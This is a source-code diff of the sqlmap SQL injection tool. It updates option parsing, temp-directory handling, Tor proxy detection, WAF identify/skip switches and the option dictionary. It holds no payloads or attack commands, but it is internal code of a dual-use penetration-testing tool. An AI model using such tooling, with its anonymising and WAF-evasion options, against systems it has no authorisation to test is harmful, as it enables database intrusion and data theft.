Valid header format is 'name:value'" % repr(headerValue).lstrip('u') raise SqlmapSyntaxException(errMsg) - elif not conf.httpHeaders or len(conf.httpHeaders) == 1: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) - if not conf.charset: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7")) - else: + elif not conf.requestFile and len(conf.httpHeaders or []) < 2: + if conf.charset: conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) # Invalidating any caching mechanism in between - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html - conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store")) - conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache")) + # Reference: http://stackoverflow.com/a/1383359 + conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) def _defaultHTTPUserAgent(): """ @@ -1371,13 +1424,6 @@ def _defaultHTTPUserAgent(): return "%s (%s)" % (VERSION_STRING, SITE) - # Firefox 3 running on Ubuntu 9.04 updated at April 2009 - #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" - - # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english - # updated at March 2009 - #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" - def _setHTTPUserAgent(): """ Set the HTTP User-Agent header. @@ -1516,24 +1562,51 @@ def _createTemporaryDirectory(): Creates temporary directory for this run. """ - try: - if not os.path.isdir(tempfile.gettempdir()): - os.makedirs(tempfile.gettempdir()) - except IOError, ex: - errMsg = "there has been a problem while accessing " - errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message - errMsg += "make sure that there is enough disk space left. If problem persists, " - errMsg += "try to set environment variable 'TEMP' to a location " - errMsg += "writeable by the current user" - raise SqlmapSystemException, errMsg + if conf.tmpDir: + try: + if not os.path.isdir(conf.tmpDir): + os.makedirs(conf.tmpDir) - if "sqlmap" not in (tempfile.tempdir or ""): - tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + _ = os.path.join(conf.tmpDir, randomStr()) + + open(_, "w+b").close() + os.remove(_) + + tempfile.tempdir = conf.tmpDir + + warnMsg = "using '%s' as the temporary directory" % conf.tmpDir + logger.warn(warnMsg) + except (OSError, IOError), ex: + errMsg = "there has been a problem while accessing " + errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) + raise SqlmapSystemException, errMsg + else: + try: + if not os.path.isdir(tempfile.gettempdir()): + os.makedirs(tempfile.gettempdir()) + except (OSError, IOError, WindowsError), ex: + warnMsg = "there has been a problem while accessing " + warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) + warnMsg += "make sure that there is enough disk space left. 
If problem persists, " + warnMsg += "try to set environment variable 'TEMP' to a location " + warnMsg += "writeable by the current user" + logger.warn(warnMsg) + + if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: + try: + tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + except (OSError, IOError, WindowsError): + tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) kb.tempDir = tempfile.tempdir if not os.path.isdir(tempfile.tempdir): - os.makedirs(tempfile.tempdir) + try: + os.makedirs(tempfile.tempdir) + except (OSError, IOError, WindowsError), ex: + errMsg = "there has been a problem while setting " + errMsg += "temporary directory location ('%s')" % getSafeExString(ex) + raise SqlmapSystemException, errMsg def _cleanupOptions(): """ @@ -1551,7 +1624,7 @@ def _cleanupOptions(): conf.progressWidth = width - 46 for key, value in conf.items(): - if value and any(key.endswith(_) for _ in ("Path", "File")): + if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): conf[key] = safeExpandUser(value) if conf.testParameter: @@ -1561,6 +1634,9 @@ def _cleanupOptions(): else: conf.testParameter = [] + if conf.agent: + conf.agent = re.sub(r"[\r\n]", "", conf.agent) + if conf.user: conf.user = conf.user.replace(" ", "") @@ -1579,6 +1655,9 @@ def _cleanupOptions(): else: conf.skip = [] + if conf.cookie: + conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) + if conf.delay: conf.delay = float(conf.delay) @@ -1607,10 +1686,10 @@ def _cleanupOptions(): setOptimize() if conf.data: - conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I) + conf.data = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data) if conf.url: - conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I) + conf.url = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url) if conf.os: conf.os = conf.os.capitalize() @@ -1622,6 +1701,20 @@ def _cleanupOptions(): conf.testFilter = conf.testFilter.strip('*+') conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) + try: + re.compile(conf.testFilter) + except re.error: + conf.testFilter = re.escape(conf.testFilter) + + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) + + try: + re.compile(conf.testSkip) + except re.error: + conf.testSkip = re.escape(conf.testSkip) + if "timeSec" not in kb.explicitSettings: if conf.tor: conf.timeSec = 2 * conf.timeSec @@ -1650,8 +1743,8 @@ def _cleanupOptions(): conf.torType = conf.torType.upper() if conf.outputDir: - paths.SQLMAP_OUTPUT_PATH = conf.outputDir - setPaths() + paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) + setPaths(paths.SQLMAP_ROOT_PATH) if conf.string: try: @@ -1675,23 +1768,40 @@ def _cleanupOptions(): conf.torType = conf.torType.upper() if conf.col: - conf.col = re.sub(r"\s*,\s*", ",", conf.col) + conf.col = re.sub(r"\s*,\s*", ',', conf.col) if conf.excludeCol: - conf.excludeCol = re.sub(r"\s*,\s*", ",", conf.excludeCol) + conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol) if conf.binaryFields: - conf.binaryFields = re.sub(r"\s*,\s*", ",", conf.binaryFields) + conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields) + + if any((conf.proxy, conf.proxyFile, 
conf.tor)): + conf.disablePrecon = True threadData = getCurrentThreadData() threadData.reset() +def _cleanupEnvironment(): + """ + Cleanup environment (e.g. from leftovers after --sqlmap-shell). + """ + + if issubclass(urllib2.socket.socket, socks.socksocket): + socks.unwrapmodule(urllib2) + + if hasattr(socket, "_ready"): + socket._ready.clear() + def _dirtyPatches(): """ Place for "dirty" Python related patches """ - httplib._MAXLINE = 1 * 1024 * 1024 # to accept overly long result lines (e.g. SQLi results in HTTP header responses) + httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses) + + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS def _purgeOutput(): """ @@ -1720,6 +1830,7 @@ def _setConfAttributes(): conf.dumpPath = None conf.hashDB = None conf.hashDBFile = None + conf.httpCollector = None conf.httpHeaders = [] conf.hostname = None conf.ipv6 = False @@ -1729,12 +1840,13 @@ def _setConfAttributes(): conf.parameters = {} conf.path = None conf.port = None - conf.proxyList = [] + conf.proxyList = None conf.resultsFilename = None conf.resultsFP = None conf.scheme = None conf.tests = [] conf.trafficFP = None + conf.HARCollectorFactory = None conf.wFileType = None def _setKnowledgeBaseAttributes(flushAll=True): @@ -1754,15 +1866,22 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.authHeader = None kb.bannerFp = AttribDict() kb.binaryField = False + kb.browserVerification = None kb.brute = AttribDict({"tables": [], "columns": []}) kb.bruteMode = False kb.cache = AttribDict() + kb.cache.addrinfo = {} kb.cache.content = {} + kb.cache.encoding = {} + kb.cache.intBoundaries = None + kb.cache.parsedDbms = {} kb.cache.regex = {} kb.cache.stdev = {} + kb.captchaDetected = None + kb.chars = AttribDict() kb.chars.delimiter = randomStr(length=6, lowercase=True) kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) @@ -1771,6 +1890,9 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.columnExistsChoice = None kb.commonOutputs = None + kb.connErrorChoice = None + kb.connErrorCounter = 0 + kb.cookieEncodeChoice = None kb.counters = {} kb.data = AttribDict() kb.dataOutputFlag = False @@ -1784,13 +1906,18 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.dnsMode = False kb.dnsTest = None kb.docRoot = None + kb.droppingRequests = False + kb.dumpColumns = None kb.dumpTable = None + kb.dumpKeyboardInterrupt = False kb.dynamicMarkings = [] kb.dynamicParameter = False kb.endDetection = False kb.explicitSettings = set() kb.extendTests = None + kb.errorChunkLength = None kb.errorIsNone = True + kb.falsePositives = [] kb.fileReadMode = False kb.followSitemapRecursion = None kb.forcedDbms = None @@ -1799,7 +1926,9 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.futileUnion = None kb.headersFp = {} kb.heuristicDbms = None + kb.heuristicExtendedDbms = None kb.heuristicMode = False + kb.heuristicPage = False kb.heuristicTest = None kb.hintValue = None kb.htmlFp = [] @@ -1814,7 +1943,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.lastParserStatus = None kb.locks = AttribDict() - for _ in ("cache", "count", "index", "io", "limit", "log", "redirect", "request", "value"): + for _ in ("cache", "connError", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"): kb.locks[_] = threading.Lock() kb.matchRatio = None @@ -1858,18 +1987,24 @@ def 
_setKnowledgeBaseAttributes(flushAll=True): kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} kb.requestCounter = 0 kb.resendPostOnRedirect = None - kb.responseTimes = [] + kb.resolutionDbms = None + kb.responseTimes = {} + kb.responseTimeMode = None + kb.responseTimePayload = None kb.resumeValues = True + kb.rowXmlMode = False kb.safeCharEncode = False kb.safeReq = AttribDict() kb.singleLogFlags = set() + kb.skipSeqMatcher = False kb.reduceTests = None - kb.tlsSNI = None + kb.tlsSNI = {} kb.stickyDBMS = False kb.stickyLevel = None kb.storeCrawlingChoice = None kb.storeHashesChoice = None kb.suppressResumeInfo = False + kb.tableFrom = None kb.technique = None kb.tempDir = None kb.testMode = False @@ -1879,7 +2014,6 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.threadContinue = True kb.threadException = False kb.tableExistsChoice = None - kb.timeValidCharsRun = 0 kb.uChar = NULL kb.unionDuplicates = False kb.xpCmdshellAvailable = False @@ -1963,64 +2097,21 @@ def _useWizardInterface(): dataToStdout("\nsqlmap is running, please wait..\n\n") -def _saveCmdline(): +def _saveConfig(): """ - Saves the command line options on a sqlmap configuration INI file + Saves the command line options to a sqlmap configuration INI file Format. """ - if not conf.saveCmdline: + if not conf.saveConfig: return - debugMsg = "saving command line options on a sqlmap configuration INI file" + debugMsg = "saving command line options to a sqlmap configuration INI file" logger.debug(debugMsg) - config = UnicodeRawConfigParser() - userOpts = {} + saveConfig(conf, conf.saveConfig) - for family in optDict.keys(): - userOpts[family] = [] - - for option, value in conf.items(): - for family, optionData in optDict.items(): - if option in optionData: - userOpts[family].append((option, value, optionData[option])) - - for family, optionData in userOpts.items(): - config.add_section(family) - - optionData.sort() - - for option, value, datatype in optionData: - if datatype and isListLike(datatype): - datatype = datatype[0] - - if value is None: - if datatype == OPTION_TYPE.BOOLEAN: - value = "False" - elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): - if option in defaults: - value = str(defaults[option]) - else: - value = "0" - elif datatype == OPTION_TYPE.STRING: - value = "" - - if isinstance(value, basestring): - value = value.replace("\n", "\n ") - - config.set(family, option, value) - - confFP = openFile(paths.SQLMAP_CONFIG, "wb") - - try: - config.write(confFP) - except IOError, ex: - errMsg = "something went wrong while trying " - errMsg += "to write to the configuration INI file '%s' ('%s')" % (paths.SQLMAP_CONFIG, ex) - raise SqlmapSystemException(errMsg) - - infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG + infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig logger.info(infoMsg) def setVerbosity(): @@ -2049,6 +2140,43 @@ def setVerbosity(): elif conf.verbose >= 5: logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) +def _normalizeOptions(inputOptions): + """ + Sets proper option types + """ + + types_ = {} + for group in optDict.keys(): + types_.update(optDict[group]) + + for key in inputOptions: + if key in types_: + value = inputOptions[key] + if value is None: + continue + + type_ = types_[key] + if type_ and isinstance(type_, tuple): + type_ = type_[0] + + if type_ == OPTION_TYPE.BOOLEAN: + try: + value = bool(value) + except (TypeError, ValueError): + value = False + elif type_ == OPTION_TYPE.INTEGER: + 
try: + value = int(value) + except (TypeError, ValueError): + value = 0 + elif type_ == OPTION_TYPE.FLOAT: + try: + value = float(value) + except (TypeError, ValueError): + value = 0.0 + + inputOptions[key] = value + def _mergeOptions(inputOptions, overrideOptions): """ Merge command line options with configuration file and default options. @@ -2057,9 +2185,6 @@ def _mergeOptions(inputOptions, overrideOptions): @type inputOptions: C{instance} """ - if inputOptions.pickledOptions: - inputOptions = base64unpickle(inputOptions.pickledOptions) - if inputOptions.configFile: configFileParser(inputOptions.configFile) @@ -2072,43 +2197,29 @@ def _mergeOptions(inputOptions, overrideOptions): if key not in conf or value not in (None, False) or overrideOptions: conf[key] = value - for key, value in conf.items(): - if value is not None: - kb.explicitSettings.add(key) + if not conf.api: + for key, value in conf.items(): + if value is not None: + kb.explicitSettings.add(key) for key, value in defaults.items(): if hasattr(conf, key) and conf[key] is None: conf[key] = value - _ = {} + lut = {} + for group in optDict.keys(): + lut.update((_.upper(), _) for _ in optDict[group]) + + envOptions = {} for key, value in os.environ.items(): if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): - _[key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()] = value - - types_ = {} - for group in optDict.keys(): - types_.update(optDict[group]) - - for key in conf: - if key.upper() in _ and key in types_: - value = _[key.upper()] - - if types_[key] == OPTION_TYPE.BOOLEAN: - try: - value = bool(value) - except ValueError: - value = False - elif types_[key] == OPTION_TYPE.INTEGER: - try: - value = int(value) - except ValueError: - value = 0 - elif types_[key] == OPTION_TYPE.FLOAT: - try: - value = float(value) - except ValueError: - value = 0.0 + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() + if _ in lut: + envOptions[lut[_]] = value + if envOptions: + _normalizeOptions(envOptions) + for key, value in envOptions.items(): conf[key] = value mergedOptions.update(conf) @@ -2120,8 +2231,14 @@ def _setTrafficOutputFP(): conf.trafficFP = openFile(conf.trafficFile, "w+") +def _setupHTTPCollector(): + if not conf.harFile: + return + + conf.httpCollector = HTTPCollectorFactory(conf.harFile).create() + def _setDNSServer(): - if not conf.dnsName: + if not conf.dnsDomain: return infoMsg = "setting up DNS server instance" @@ -2149,7 +2266,7 @@ def _setProxyList(): return conf.proxyList = [] - for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w.]+):(\d+)", readCachedFileContent(conf.proxyFile)): + for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)): _, type_, address, port = match.groups() conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) @@ -2166,31 +2283,14 @@ def _setTorHttpProxySettings(): infoMsg = "setting Tor HTTP proxy settings" logger.info(infoMsg) - found = None + port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)) - for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((LOCALHOST, port)) - found = port - break - except socket.error: - pass - - s.close() - - if found: - conf.proxy = "http://%s:%d" % (LOCALHOST, found) + if port: + conf.proxy = "http://%s:%d" % (LOCALHOST, port) else: - errMsg = "can't establish connection with the Tor proxy. 
" - errMsg += "Please make sure that you have Vidalia, Privoxy or " - errMsg += "Polipo bundle installed for you to be able to " - errMsg += "successfully use switch '--tor' " - - if IS_WIN: - errMsg += "(e.g. https://www.torproject.org/projects/vidalia.html.en)" - else: - errMsg += "(e.g. http://www.coresec.org/2011/04/24/sqlmap-with-tor/)" + errMsg = "can't establish connection with the Tor HTTP proxy. " + errMsg += "Please make sure that you have Tor (bundle) installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " raise SqlmapConnectionException(errMsg) @@ -2206,14 +2306,20 @@ def _setTorSocksProxySettings(): infoMsg = "setting Tor SOCKS proxy settings" logger.info(infoMsg) - # Has to be SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) + port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,)) + + if not port: + errMsg = "can't establish connection with the Tor SOCKS proxy. " + errMsg += "Please make sure that you have Tor service installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " + + raise SqlmapConnectionException(errMsg) + + # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port) socks.wrapmodule(urllib2) def _checkWebSocket(): - infoMsg = "checking for WebSocket" - logger.debug(infoMsg) - if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): try: from websocket import ABNF @@ -2229,9 +2335,13 @@ def _checkTor(): infoMsg = "checking Tor connection" logger.info(infoMsg) - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + except SqlmapConnectionException: + page = None + if not page or 'Congratulations' not in page: - errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" + errMsg = "it appears that Tor is not properly set. 
Please try using options '--tor-type' and/or '--tor-port'" raise SqlmapConnectionException(errMsg) else: infoMsg = "Tor is properly being used" @@ -2264,18 +2374,22 @@ def _basicOptionValidation(): errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" raise SqlmapSyntaxException(errMsg) - if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): - errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]" - raise SqlmapSyntaxException(errMsg) - if conf.textOnly and conf.nullConnection: errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.eta and conf.verbose > defaults.verbose: + errMsg = "switch '--eta' is incompatible with option '-v'" + raise SqlmapSyntaxException(errMsg) + if conf.direct and conf.url: errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) + if conf.identifyWaf and conf.skipWaf: + errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" + raise SqlmapSyntaxException(errMsg) + if conf.titles and conf.nullConnection: errMsg = "switch '--titles' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) @@ -2284,6 +2398,10 @@ def _basicOptionValidation(): errMsg = "switch '--dump' is incompatible with switch '--search'" raise SqlmapSyntaxException(errMsg) + if conf.api and not conf.configFile: + errMsg = "switch '--api' requires usage of option '-c'" + raise SqlmapSyntaxException(errMsg) + if conf.data and conf.nullConnection: errMsg = "option '--data' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) @@ -2315,15 +2433,15 @@ def _basicOptionValidation(): if conf.regexp: try: re.compile(conf.regexp) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, ex) + except Exception, ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) raise SqlmapSyntaxException(errMsg) if conf.crawlExclude: try: re.compile(conf.crawlExclude) - except re.error, ex: - errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, ex) + except Exception, ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) raise SqlmapSyntaxException(errMsg) if conf.dumpTable and conf.dumpAll: @@ -2390,6 +2508,10 @@ def _basicOptionValidation(): errMsg = "switch '--tor' is incompatible with option '--proxy'" raise SqlmapSyntaxException(errMsg) + if conf.proxy and conf.proxyFile: + errMsg = "switch '--proxy' is incompatible with option '--proxy-file'" + raise SqlmapSyntaxException(errMsg) + if conf.checkTor and not any((conf.tor, conf.proxy)): errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)" raise SqlmapSyntaxException(errMsg) @@ -2456,13 +2578,12 @@ def _resolveCrossReferences(): lib.core.threads.readInput = readInput lib.core.common.getPageTemplate = getPageTemplate lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage - lib.request.connect.setHTTPProxy = _setHTTPProxy + lib.request.connect.setHTTPHandlers = _setHTTPHandlers + lib.utils.search.setHTTPHandlers = _setHTTPHandlers lib.controller.checks.setVerbosity = setVerbosity + lib.controller.checks.setWafFunctions = _setWafFunctions def initOptions(inputOptions=AttribDict(), overrideOptions=False): - if IS_WIN: - coloramainit() - 
_setConfAttributes() _setKnowledgeBaseAttributes() _mergeOptions(inputOptions, overrideOptions) @@ -2475,9 +2596,10 @@ def init(): _useWizardInterface() setVerbosity() - _saveCmdline() + _saveConfig() _setRequestFromFile() _cleanupOptions() + _cleanupEnvironment() _dirtyPatches() _purgeOutput() _checkDependencies() @@ -2491,6 +2613,7 @@ def init(): _setTamperingFunctions() _setWafFunctions() _setTrafficOutputFP() + _setupHTTPCollector() _resolveCrossReferences() _checkWebSocket() @@ -2505,13 +2628,13 @@ def init(): _setHTTPHost() _setHTTPUserAgent() _setHTTPAuthentication() - _setHTTPProxy() + _setHTTPHandlers() _setDNSCache() + _setSocketPreConnect() _setSafeVisit() - _setGoogleDorking() + _doSearch() _setBulkMultipleTargets() _setSitemapTargets() - _urllib2Opener() _checkTor() _setCrawler() _findPageForms() diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index b9adbd67b..e17937c46 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -37,11 +37,14 @@ optDict = { "headers": "string", "authType": "string", "authCred": "string", - "authPrivate": "string", + "authFile": "string", + "ignore401": "boolean", + "ignoreProxy": "boolean", + "ignoreRedirects": "boolean", + "ignoreTimeouts": "boolean", "proxy": "string", "proxyCred": "string", "proxyFile": "string", - "ignoreProxy": "boolean", "tor": "boolean", "torPort": "integer", "torType": "string", @@ -74,6 +77,7 @@ optDict = { "testParameter": "string", "skip": "string", "skipStatic": "boolean", + "paramExclude": "string", "dbms": "string", "dbmsCred": "string", "os": "string", @@ -104,7 +108,7 @@ optDict = { "uCols": "string", "uChar": "string", "uFrom": "string", - "dnsName": "string", + "dnsDomain": "string", "secondOrder": "string", }, @@ -136,6 +140,7 @@ optDict = { "tbl": "string", "col": "string", "excludeCol": "string", + "pivotColumn": "string", "dumpWhere": "string", "user": "string", "excludeSysDbs": "boolean", @@ -189,7 +194,9 @@ optDict = { #"xmlFile": "string", "trafficFile": "string", "batch": "boolean", + "binaryFields": "string", "charset": "string", + "checkInternet": "boolean", "crawlDepth": "integer", "crawlExclude": "string", "csvDel": "string", @@ -198,13 +205,14 @@ optDict = { "flushSession": "boolean", "forms": "boolean", "freshQueries": "boolean", + "harFile": "string", "hexConvert": "boolean", "outputDir": "string", "parseErrors": "boolean", - "pivotColumn": "string", - "saveCmdline": "boolean", + "saveConfig": "string", "scope": "string", "testFilter": "string", + "testSkip": "string", "updateAll": "boolean", }, @@ -216,25 +224,31 @@ optDict = { "dependencies": "boolean", "disableColoring": "boolean", "googlePage": "integer", + "identifyWaf": "boolean", "mobile": "boolean", "offline": "boolean", - "pageRank": "boolean", "purgeOutput": "boolean", + "skipWaf": "boolean", "smart": "boolean", + "tmpDir": "string", + "webRoot": "string", "wizard": "boolean", "verbose": "integer", }, "Hidden": { "dummy": "boolean", - "binaryFields": "string", + "disablePrecon": "boolean", "profile": "boolean", - "cpuThrottle": "integer", "forceDns": "boolean", - "identifyWaf": "boolean", - "ignore401": "boolean", + "murphyRate": "integer", "smokeTest": "boolean", "liveTest": "boolean", "stopFail": "boolean", "runCase": "string", + }, + "API": { + "api": "boolean", + "taskid": "string", + 
"database": "string", } } diff --git a/lib/core/profiling.py b/lib/core/profiling.py index c212a0bb5..ff1cc3f1d 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -26,9 +26,8 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): import gtk import pydot except ImportError, e: - errMsg = "profiling requires third-party libraries (%s). " % getUnicode(e, UNICODE_ENCODING) - errMsg += "Quick steps:%s" % os.linesep - errMsg += "1) sudo apt-get install python-pydot python-pyparsing python-profiler graphviz" + errMsg = "profiling requires third-party libraries ('%s') " % getUnicode(e, UNICODE_ENCODING) + errMsg += "(Hint: 'sudo apt-get install python-pydot python-pyparsing python-profiler graphviz')" logger.error(errMsg) return @@ -76,6 +75,11 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): # Create graph image (png) by using pydot (python-pydot) # http://code.google.com/p/pydot/ pydotGraph = pydot.graph_from_dot_file(dotOutputFile) + + # Reference: http://stackoverflow.com/questions/38176472/graph-write-pdfiris-pdf-attributeerror-list-object-has-no-attribute-writ + if isinstance(pydotGraph, list): + pydotGraph = pydotGraph[0] + pydotGraph.write_png(imageOutputFile) infoMsg = "displaying interactive graph with xdot library" @@ -87,5 +91,4 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): win.connect('destroy', gtk.main_quit) win.set_filter("dot") win.open_file(dotOutputFile) - gobject.timeout_add(1000, win.update, dotOutputFile) gtk.main() diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py index 2dc0467c4..cf95f3926 100644 --- a/lib/core/readlineng.py +++ b/lib/core/readlineng.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/replication.py b/lib/core/replication.py index c5bbd24cc..1bcbeb2a7 100644 --- a/lib/core/replication.py +++ b/lib/core/replication.py @@ -1,16 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import sqlite3 from extra.safe2bin.safe2bin import safechardecode +from lib.core.common import getSafeExString from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapValueException +from lib.core.settings import UNICODE_ENCODING class Replication(object): """ @@ -19,10 +22,15 @@ class Replication(object): """ def __init__(self, dbpath): - self.dbpath = dbpath - self.connection = sqlite3.connect(dbpath) - self.connection.isolation_level = None - self.cursor = self.connection.cursor() + try: + self.dbpath = dbpath + self.connection = sqlite3.connect(dbpath) + self.connection.isolation_level = None + self.cursor = self.connection.cursor() + except sqlite3.OperationalError, ex: + errMsg = "error occurred while opening a replication " + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) 
